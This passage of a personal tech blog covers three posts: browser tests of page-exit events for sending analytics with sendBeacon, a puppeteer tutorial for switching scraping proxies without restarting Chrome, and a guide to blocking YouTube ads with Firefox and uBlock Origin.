<tbody>
<tr>
<td>visibilitychange (hidden)</td>
<td>HTML loaded</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>visibilitychange (hidden)</td>
<td>Close active Tab</td>
<td>✓ (event is triggered twice!)</td>
<td>✓</td>
</tr>
<tr>
<td>visibilitychange (hidden)</td>
<td>Switch Tab</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td>visibilitychange (hidden)</td>
<td>Close Browser</td>
<td>✓ (event is triggered twice!)</td>
<td>✓</td>
</tr>
<tr>
<td>visibilitychange (hidden)</td>
<td>Navigate away by clicking link</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>beforeunload</td>
<td>HTML loaded</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>beforeunload</td>
<td>Close active Tab</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td>beforeunload</td>
<td>Switch Tab</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>beforeunload</td>
<td>Close Browser</td>
<td>✓</td>
<td>✗</td>
</tr>
<tr>
<td>beforeunload</td>
<td>Navigate away by clicking link</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>unload</td>
<td>HTML loaded</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>unload</td>
<td>Close active Tab</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td>unload</td>
<td>Switch Tab</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>unload</td>
<td>Close Browser</td>
<td>✓</td>
<td>✗</td>
</tr>
<tr>
<td>unload</td>
<td>Navigate away by clicking link</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>pagehide</td>
<td>HTML loaded</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>pagehide</td>
<td>Close active Tab</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td>pagehide</td>
<td>Switch Tab</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>pagehide</td>
<td>Close Browser</td>
<td>✓</td>
<td>✗</td>
</tr>
<tr>
<td>pagehide</td>
<td>Navigate away by clicking link</td>
<td>✓</td>
<td>✓</td>
</tr>
</tbody>
</table>
<p>It can be seen that the beacon is successfully received when using the event <code>visibilitychange</code>. The other events are not ideal and reliable for transmitting analytics data.</p>
<p>The following data was obtained on a mobile phone <strong>Android Phone Motorola g(6)</strong> device. The behavior of the
event was tested with actions suited for mobile platforms.</p>
<table>
<thead>
<tr>
<th>Event</th>
<th>Action</th>
<th>Mobile Chrome/87.0.4280.101</th>
<th>Mobile Firefox/84.0</th>
</tr>
</thead>
<tbody>
<tr>
<td>visibilitychange (hidden)</td>
<td>HTML loaded</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>visibilitychange (hidden)</td>
<td>Press Home Button</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td>visibilitychange (hidden)</td>
<td>Open Task Management</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td>visibilitychange (hidden)</td>
<td>Close Tab</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td>visibilitychange (hidden)</td>
<td>Navigate away by clicking link</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>beforeunload</td>
<td>HTML loaded</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>beforeunload</td>
<td>Press Home Button</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>beforeunload</td>
<td>Open Task Management</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>beforeunload</td>
<td>Close Tab</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>beforeunload</td>
<td>Navigate away by clicking link</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>unload</td>
<td>HTML loaded</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>unload</td>
<td>Press Home Button</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>unload</td>
<td>Open Task Management</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>unload</td>
<td>Close Tab</td>
<td>✗</td>
<td>✓</td>
</tr>
<tr>
<td>unload</td>
<td>Navigate away by clicking link</td>
<td>✗ (unreliable)</td>
<td>✓</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>pagehide</td>
<td>HTML loaded</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>pagehide</td>
<td>Press Home Button</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>pagehide</td>
<td>Open Task Management</td>
<td>✗</td>
<td>✗</td>
</tr>
<tr>
<td>pagehide</td>
<td>Close Tab</td>
<td>✗ (unreliable)</td>
<td>✓</td>
</tr>
<tr>
<td>pagehide</td>
<td>Navigate away by clicking link</td>
<td>✓</td>
<td>✓</td>
</tr>
</tbody>
</table>
<p>Again, on both mobile browsers, the <code>visibilitychange</code> seems to be the only rational choice when sending analytics data to a remote server. The other events do not reliably guarantee the delivery of the beacon data.</p>
<h3>Analytics Algorithm</h3>
<p>Now that it has been established that it's best to consider the <code>visibilitychange</code> event, let's implement a simple algorithm that sends data to our remote server to collect the analytics data. The following JavaScript needs to be embedded in the <code><body></code> element.</p>
<div class="highlight"><pre><span></span><code><span class="c1">// to be generated randomly by the server</span>
<span class="kd">var</span> <span class="nx">uuid</span> <span class="o">=</span> <span class="s1">'{random-uuid}'</span><span class="p">;</span>
<span class="c1">// base url </span>
<span class="kd">var</span> <span class="nx">url</span> <span class="o">=</span> <span class="s1">'https://example.org/path'</span><span class="p">;</span>
<span class="c1">// Instantiate a analytics object</span>
<span class="kd">var</span> <span class="nx">analytics</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Analytics</span><span class="p">();</span>
<span class="c1">// Start recording analytics data</span>
<span class="nx">analytics</span><span class="p">.</span><span class="nx">record</span><span class="p">();</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"visibilitychange"</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">visibilityState</span> <span class="o">===</span> <span class="s1">'hidden'</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">data</span> <span class="o">=</span> <span class="p">{</span>
<span class="nx">uuid</span><span class="o">:</span> <span class="nx">uuid</span><span class="p">,</span>
<span class="c1">// subsequent calls to getData() </span>
<span class="c1">// will yield newly generated analytics data only</span>
<span class="nx">data</span><span class="o">:</span> <span class="nx">analytics</span><span class="p">.</span><span class="nx">getData</span><span class="p">(),</span>
<span class="nx">href</span><span class="o">:</span> <span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span>
<span class="p">};</span>
<span class="nx">navigator</span><span class="p">.</span><span class="nx">sendBeacon</span><span class="p">(</span><span class="nx">url</span><span class="p">,</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">data</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">});</span>
</code></pre></div>
<h3>What is the maximum payload size of <code>sendBeacon()</code>?</h3>
<p>The last question that needs to be answered: How much analytics data can we transmit at once with <code>sendBeacon()</code>?</p>
<p>This question was <a href="https://stackoverflow.com/questions/28989640/navigator-sendbeacon-data-size-limits#">already asked on Stackoverflow</a> and it seems that the maximum payload is <code>2^16 = 65536 Bytes</code>.</p>
<p>This means that analytics data needs to be either compressed or sent in chunks (or both actually).</p>
<p>Some good compression libraries for JavaScript would be <a href="https://github.com/nodeca/pako">pako</a> and <a href="https://github.com/101arrowz/fflate">fflate</a>. fflate is probably the better choice, since it is smaller and faster.</p>
<p>Another solution would be to just send the analytics data to the server as soon as we approach the 65536 byte limit and then reassemble the chunks on the server. </p>
<h3>Statistics</h3>
<p>In this section, statistics of analytics sessions are published as soon as enough data was gathered. With this data, it can be answered how many browsers support the <code>visibilitychange</code> and <code>navigator.sendBeacon()</code> combination.</p>
<p>To be done. </p>
<h3>Conclusion</h3>
<p>There are several tricky problems that need to be solved when you want to create an analytics application that is widely supported on most browsers.</p>
<p>To summarize, the following problems were solved in this blog article:</p>
<ol>
<li>What event is the best to listen for when you want to capture the moment a user leaves or terminates the browsing session? <strong>Answer: <code>visibilitychange</code></strong></li>
<li>What HTTP API is the best to use in order to transmit your analytics data to the remote server? <strong>Answer: <code>navigator.sendBeacon()</code></strong></li>
</ol>Dynamically changing proxies with puppeteer2020-12-20T00:22:00+01:002020-12-21T22:23:00+01:00Nikolai Tschachertag:incolumitas.com,2020-12-20:/2020/12/20/dynamically-changing-puppeteer-proxies/<p>The chrome browser controlled via puppeteer doesn't support the dynamic change of proxies without restarting the browser. In this tutorial, I demonstrate how to implement this functionality with the help of a third party npm module named <code>proxy-chain</code>. This module acts as an intermediate proxy.</p><p>The chrome browser does not support fain-grained proxy configuration out of the box. Therefore, the following use cases are not possible when using puppeteer in combination with Google Chrome:</p>
<ul>
<li>Using different proxies for different tabs/windows</li>
<li>Switching proxies without restarting the browser</li>
</ul>
<p>This is a bit annoying, because restarting the entire browser is an expensive operation in terms of computational resources. The chrome restart takes up to two seconds (depending on the system). We ideally want to switch proxies whenever the need arises without restarting the entire chrome process. This is a common requirement when scraping websites in scale.</p>
<p>One solution is to use a intermediate proxy server that routes traffic to the upstream proxy. This is exactly what I am going to implement in this blog post.</p>
<p>This is the design and network flow of the intended solution:</p>
<div class="highlight"><pre><span></span><code><span class="p">[</span><span class="n">local</span><span class="w"> </span><span class="n">Chrome</span><span class="w"> </span><span class="n">instance</span><span class="p">]</span><span class="w"> </span><span class="o"><====></span><span class="w"> </span><span class="p">[</span><span class="n">local</span><span class="w"> </span><span class="n">intermediate</span><span class="w"> </span><span class="n">proxy</span><span class="w"> </span><span class="n">server</span><span class="p">]</span><span class="w"> </span><span class="o"><====></span><span class="w"> </span><span class="p">[</span><span class="n">upstream</span><span class="w"> </span><span class="n">proxy</span><span class="p">]</span><span class="w"> </span><span class="o"><====></span><span class="w"> </span><span class="p">[</span><span class="n">target</span><span class="w"> </span><span class="n">website</span><span class="p">]</span><span class="w"></span>
</code></pre></div>
<p>In this tutorial, I will build a very simple API that allows the API caller to make requests with the chrome browser. The caller can specify the following parameters:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span>
<span class="s2">"url"</span><span class="o">:</span> <span class="s2">"string"</span><span class="p">,</span>
<span class="s2">"proxy"</span><span class="o">:</span> <span class="s2">"string"</span>
<span class="p">}</span>
</code></pre></div>
<p>As a response, the rendered HTML will be returned. If a valid proxy is specified, the URL will be requested through the proxy. If no proxy is passed, no proxy will be used. The browser will never be restarted in between requests. Browser cookies are cleared between API calls in order to hinder websites from assigning identifying cookies to the browser session.</p>
<h3>Implementation</h3>
<p>The up-to-date source code can be found in the respective <a href="https://github.com/NikolaiT/dynamically-changing-puppeteer-proxies">Github repository</a>.</p>
<p>Without further ado, the full implementation of the proof of concept can be found in the code snippet below.</p>
<p>In order to setup the program, you need to issue the following commands:</p>
<div class="highlight"><pre><span></span><code>npm i puppeteer-core express body-parser valid-url proxy-chain
</code></pre></div>
<p>And then copy paste the code snippet from below and save it as <code>dynamic-proxy-API.js</code> and execute it with:</p>
<div class="highlight"><pre><span></span><code>node dynamic-proxy-API.js
</code></pre></div>
<p>The API can be used with a sample proxy such as <code>http://11.22.33.44:1234/</code> by making a curl request (Requesting the website <code>http://httpbin.org/get</code>):</p>
<div class="highlight"><pre><span></span><code>curl -i <span class="s2">"http://localhost:3333/api?url=http://httpbin.org/get&proxy=http://11.22.33.44:1234/"</span>
</code></pre></div>
<p>On the initial API call, the browser will be launched. The next API call with a new proxy <code>http://22.22.22.22:2222/</code> will use the same browser session but with a new proxy.</p>
<div class="highlight"><pre><span></span><code>curl -i <span class="s2">"http://localhost:3333/api?url=http://httpbin.org/get&proxy=http://22.22.22.22:2222/"</span>
</code></pre></div>
<p>Below is the dynamic proxy API. If there are any problems with the source code, please leave an <a href="https://github.com/NikolaiT/dynamically-changing-puppeteer-proxies">issue here</a>.</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">express</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'express'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">bodyParser</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'body-parser'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">validUrl</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'valid-url'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">puppeteer</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'puppeteer-core'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">ProxyChain</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'proxy-chain'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">CHROME_BINARY_PATH</span> <span class="o">=</span> <span class="s1">'/usr/bin/chromium-browser'</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">app</span> <span class="o">=</span> <span class="nx">express</span><span class="p">();</span>
<span class="kd">const</span> <span class="nx">port</span> <span class="o">=</span> <span class="mf">3333</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">proxyServerPort</span> <span class="o">=</span> <span class="mf">8947</span><span class="p">;</span>
<span class="kd">let</span> <span class="nx">browser</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">express</span><span class="p">.</span><span class="nx">json</span><span class="p">());</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">bodyParser</span><span class="p">.</span><span class="nx">json</span><span class="p">({</span> <span class="nx">limit</span><span class="o">:</span> <span class="s1">'2mb'</span> <span class="p">}));</span>
<span class="kd">function</span> <span class="nx">log</span><span class="p">(</span><span class="nx">msg</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`[</span><span class="si">${</span><span class="p">(</span><span class="ow">new</span> <span class="nb">Date</span><span class="p">()).</span><span class="nx">getTime</span><span class="p">()</span><span class="si">}</span><span class="sb">] - </span><span class="si">${</span><span class="nx">msg</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">validateProxy</span><span class="p">(</span><span class="nx">proxy</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">match</span> <span class="o">=</span> <span class="kc">false</span><span class="p">;</span>
<span class="kd">let</span> <span class="nx">prefixes</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'http://'</span><span class="p">,</span> <span class="s1">'https://'</span><span class="p">,</span> <span class="s1">'socks://'</span><span class="p">,</span> <span class="s1">'socks5://'</span><span class="p">,</span> <span class="s1">'socks4://'</span><span class="p">];</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">prefix</span> <span class="k">of</span> <span class="nx">prefixes</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">proxy</span><span class="p">.</span><span class="nx">startsWith</span><span class="p">(</span><span class="nx">prefix</span><span class="p">))</span> <span class="p">{</span>
<span class="nx">match</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">match</span> <span class="o">===</span> <span class="kc">false</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="kc">false</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">validUrl</span><span class="p">.</span><span class="nx">isWebUri</span><span class="p">(</span><span class="nx">proxy</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">getBrowser</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">browser</span> <span class="o">===</span> <span class="kc">null</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span>
<span class="nx">executablePath</span><span class="o">:</span> <span class="nx">CHROME_BINARY_PATH</span><span class="p">,</span>
<span class="nx">headless</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span>
<span class="nx">args</span><span class="o">:</span> <span class="p">[</span><span class="sb">`--proxy-server=http://localhost:`</span> <span class="o">+</span> <span class="nx">proxyServerPort</span><span class="p">],</span>
<span class="p">});</span>
<span class="nx">log</span><span class="p">(</span><span class="s1">'Browser started'</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">startProxyServer</span><span class="p">(</span><span class="nx">proxy</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">server</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">ProxyChain</span><span class="p">.</span><span class="nx">Server</span><span class="p">({</span>
<span class="nx">port</span><span class="o">:</span> <span class="nx">proxyServerPort</span><span class="p">,</span>
<span class="nx">verbose</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span>
<span class="nx">prepareRequestFunction</span><span class="o">:</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">params</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="p">{</span><span class="nx">request</span><span class="p">,</span> <span class="nx">username</span><span class="p">,</span> <span class="nx">password</span><span class="p">,</span> <span class="nx">hostname</span><span class="p">,</span> <span class="nx">port</span><span class="p">,</span> <span class="nx">isHttp</span><span class="p">,</span> <span class="nx">connectionId</span><span class="p">}</span> <span class="o">=</span> <span class="nx">params</span><span class="p">;</span>
<span class="k">return</span> <span class="p">{</span>
<span class="nx">requestAuthentication</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span>
<span class="c1">// http://username:password@proxy.example.com:3128</span>
<span class="nx">upstreamProxyUrl</span><span class="o">:</span> <span class="nx">proxy</span><span class="p">,</span>
<span class="p">};</span>
<span class="p">},</span>
<span class="p">});</span>
<span class="c1">// Emitted when HTTP connection is closed</span>
<span class="nx">server</span><span class="p">.</span><span class="nx">on</span><span class="p">(</span><span class="s1">'connectionClosed'</span><span class="p">,</span> <span class="p">(</span><span class="nx">params</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="p">{</span><span class="nx">connectionId</span><span class="p">,</span> <span class="nx">stats</span><span class="p">}</span> <span class="o">=</span> <span class="nx">params</span><span class="p">;</span>
<span class="nx">log</span><span class="p">(</span><span class="sb">`Connection </span><span class="si">${</span><span class="nx">connectionId</span><span class="si">}</span><span class="sb"> closed`</span><span class="p">);</span>
<span class="p">});</span>
<span class="c1">// Emitted when HTTP request fails</span>
<span class="nx">server</span><span class="p">.</span><span class="nx">on</span><span class="p">(</span><span class="s1">'requestFailed'</span><span class="p">,</span> <span class="p">(</span><span class="nx">params</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="p">{</span><span class="nx">request</span><span class="p">,</span> <span class="nx">error</span><span class="p">}</span> <span class="o">=</span> <span class="nx">params</span><span class="p">;</span>
<span class="nx">log</span><span class="p">(</span><span class="sb">`Request </span><span class="si">${</span><span class="nx">request</span><span class="p">.</span><span class="nx">url</span><span class="si">}</span><span class="sb"> failed with error </span><span class="si">${</span><span class="nx">error</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="p">});</span>
<span class="nx">server</span><span class="p">.</span><span class="nx">listen</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">log</span><span class="p">(</span><span class="sb">`ProxyServer listening on port </span><span class="si">${</span><span class="nx">server</span><span class="p">.</span><span class="nx">port</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="nx">resolve</span><span class="p">(</span><span class="nx">server</span><span class="p">);</span>
<span class="p">});</span>
<span class="p">});</span>
<span class="p">}</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">clearCookies</span><span class="p">(</span><span class="nx">page</span><span class="p">)</span> <span class="p">{</span>
<span class="k">try</span> <span class="p">{</span>
<span class="nx">log</span><span class="p">(</span><span class="s1">'Deleting cookies with Network.clearBrowserCookies'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">client</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">target</span><span class="p">().</span><span class="nx">createCDPSession</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">client</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'Network.clearBrowserCookies'</span><span class="p">);</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">log</span><span class="p">(</span><span class="sb">`Could not delete cookies: </span><span class="si">${</span><span class="nx">err</span><span class="p">.</span><span class="nx">toString</span><span class="p">()</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/api'</span><span class="p">,</span> <span class="k">async</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">proxy</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">validateProxy</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">proxy</span><span class="p">))</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">403</span><span class="p">).</span><span class="nx">send</span><span class="p">(</span><span class="s1">'Invalid proxy format'</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nx">log</span><span class="p">(</span><span class="sb">`Using proxy: </span><span class="si">${</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">proxy</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">url</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">validUrl</span><span class="p">.</span><span class="nx">isWebUri</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">url</span><span class="p">))</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">403</span><span class="p">).</span><span class="nx">send</span><span class="p">(</span><span class="sb">`url is not valid`</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">403</span><span class="p">).</span><span class="nx">send</span><span class="p">(</span><span class="sb">`url is required`</span><span class="p">);</span>
<span class="p">}</span>
<span class="kd">let</span> <span class="nx">proxyServer</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">startProxyServer</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">proxy</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">getBrowser</span><span class="p">();</span>
<span class="kd">let</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">url</span><span class="p">,</span> <span class="p">{</span> <span class="nx">waitUntil</span><span class="o">:</span> <span class="s2">"domcontentloaded"</span> <span class="p">});</span>
<span class="kd">let</span> <span class="nx">content</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">content</span><span class="p">();</span>
<span class="c1">// clear cookies after we are done</span>
<span class="k">await</span> <span class="nx">clearCookies</span><span class="p">(</span><span class="nx">page</span><span class="p">);</span>
<span class="nx">proxyServer</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">set</span><span class="p">(</span><span class="s1">'Content-Type'</span><span class="p">,</span> <span class="s1">'text/html'</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nx">Buffer</span><span class="p">.</span><span class="kr">from</span><span class="p">(</span><span class="nx">content</span><span class="p">));</span>
<span class="p">});</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">listen</span><span class="p">(</span><span class="nx">port</span><span class="p">,</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">log</span><span class="p">(</span><span class="sb">`Dynamic proxy puppeteer Api listening on port </span><span class="si">${</span><span class="nx">port</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="p">});</span>
</code></pre></div>Remove YouTube Ads from your Android Phone2020-12-16T19:14:00+01:002020-12-18T19:32:00+01:00Nikolai Tschachertag:incolumitas.com,2020-12-16:/2020/12/16/removing-youtube-ads-from-android-phone/<p>I am a heavy user of YouTube. I use it to listen to podcasts while cooking or in order to watch the latest documentaries before going to sleep. But lately, the extremely aggressive advertisement of YouTube sparked enough motivation within myself to remove YouTube ads for good. Google overdid it. I have enough.</p><p>This guide works both for Android and IPhone users. It will show you how to get rid of YouTube ads on your smarthone in five easy steps.</p>
<p>Google makes it technically not possible to remove YouTube ads in the native YouTube app from your smartphone. You have no other option than to watch up to ten advertisement clips for every video. Those ads can be extremely annoying.</p>
<p>At the time of writing, YouTube is playing more ads than the worst private cable TV channel ever did. This is no longer acceptable!</p>
<p>Google is hording enormous amounts of wealth and they monopolize the Internet search market and advertisement. While I can understand that content creators want to be payed, I will not tolerate those extremely annoying ads any longer.</p>
<p>I endured this for a very long time, but enough is enough. In this blog article, I provide a step by step instruction how to get rid of YouTube ads for good.</p>
<p>So what do I want?</p>
<ol>
<li>I want YouTube videos without any ads</li>
<li>I don't want to install some shady third party app on my phone</li>
<li>YouTube needs to me more or less easy to use as it is in the native app</li>
<li>Bonus: I want to continue watching/listening to YouTube when my phone is in sleep mode. For example I often listen to podcasts while walking around.</li>
</ol>
<h3>Tutorial: Remove YouTube Ads with Firefox and uBlock Origin</h3>
<p>I came up with following solution: I will install the Firefox mobile browser and then add the uBlock Origin extension to the Firefox browser. This will remove all ads on all websites, including YouTube!</p>
<p>What follows are instructions that you can follow in order to remove all ads from YouTube:</p>
<p><strong>Step 1:</strong> Install Firefox from the Android Playstore.</p>
<figure>
<img class="smallimg" src="https://incolumitas.com/images/android/install-firefox.png" alt="Install Firefox from the playstore" />
<figcaption>Install Firefox from the Android Playstore</figcaption>
</figure>
<p><strong>Step 2:</strong> After Firefox is installed, open the Firefox browser.</p>
<p><strong>Step 3:</strong> In Firefox -> Click on the "three point menu" at the bottom right -> Addons -> Addon manager -> enable uBlock Origin</p>
<figure>
<img class="smallimg" src="https://incolumitas.com/images/android/firefox-menu.png" alt="Open the firefox menu" />
<figcaption>Open the browser settings...</figcaption>
</figure>
<figure>
<img class="smallimg" src="https://incolumitas.com/images/android/firefox-addons.png" alt="Open the addons manager" />
<figcaption>...And add uBlock Origin from the addons menu</figcaption>
</figure>
<p><strong>Step 4:</strong> After uBlock Origin is enabled, you can navigate to YouTube (or any other website) and enjoy it without any ads!</p>
<p><strong>Step 5:</strong> Add YouTube from Firefox as a shortcut to you Android home screen. Replace it with the native YouTube app icon so that you never have to use the native YouTube app with ads again.</p>
<figure>
<img class="smallimg" src="https://incolumitas.com/images/android/youtube-homescreen.png" alt="Add a YouTube shortcut to the homescreen" />
<figcaption>Add a Firefox YouTube shortcut to the homescreen</figcaption>
</figure>
<p>Using YouTube from Firefox is not quite as fast as the native app, but in my experience, not worrying about extremely annoying ads is much better than to use the native app! And YouTube from within the Firefox browser is reasonably fast enough! There are no major issues and the content is exactly the same - Just without ads.</p>
<h3>Native YouTube App</h3>
<p>Unfortunately, <a href="https://adlock.com/blog/how-to-block-youtube-ads-on-android/">it is not possible</a> to block advertisements from the native YouTube app.</p>
<blockquote>
